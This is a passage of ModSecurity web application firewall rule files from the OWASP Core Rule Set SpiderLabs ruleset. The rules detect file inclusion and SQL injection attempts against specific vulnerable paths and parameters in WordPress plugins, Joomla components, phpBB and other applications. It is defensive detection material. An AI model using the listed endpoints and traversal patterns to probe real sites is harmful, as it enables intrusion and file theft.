Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012217) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /op/op.Login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012217,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37828'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LetoDMS lang Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012336,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012343) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /active_auctions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012343,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lan "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt SecRule REQUEST_LINE "@contains /gradebook/open_document.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012354,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt',tag:'web-application-attack',tag:'bugtraq,46173'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos and Chamilo open_document.php file Parameter File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /util/barcode.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012373,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:type "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012407,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-runnow-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012408,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains /options-view_log-iframe.php?wpabs=/" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:\\x00\&logfile\=\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Potential Wordpress local file disclosure vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012657,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:sleep "@contains file=" "chain" SecRule ARGS:sleep "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/lcUser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012668,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:LIBDIR "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012721) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/filemanager/get_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012721,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/PluginController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012750,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:path "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/connector.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012794,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,47636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CurrentFolder "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /authenticate/sessions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012945,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:globalIncludeFilePath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure Attempt SecRule REQUEST_LINE "@contains /telecharger.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012947,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:Fichier_a_telecharger/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebC.be Fichier_a_telecharger Parameter Local File Disclosure Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /scr/soustab.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dsn[phptype] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin page Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2013464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/ungallery/source_vuln.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013464,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pic "(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress UnGallery pic Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_LFI_RULES �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_phpbb_attacks.conf�����0000664�0000000�0000000�00000050173�12164572564�0033377�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_phpbb.data" "id:'2000002',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_PHPBB_RULES" # (2008964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /portal_block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:phpbb_root_path "(?i:phpbb_root_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2008965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /acp_lcxbbportal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:phpbb_root_path "(?i:phpbb_root_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2008938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pfad "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2002731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt SecRule REQUEST_LINE "@contains .php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002731,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt',tag:'web-application-attack'" SecRule ARGS:phpbb_root_path "(?i:phpbb_root_path=(ftps?|https?|php))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Generic phpbb arbitrary command attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005967) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005967,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" 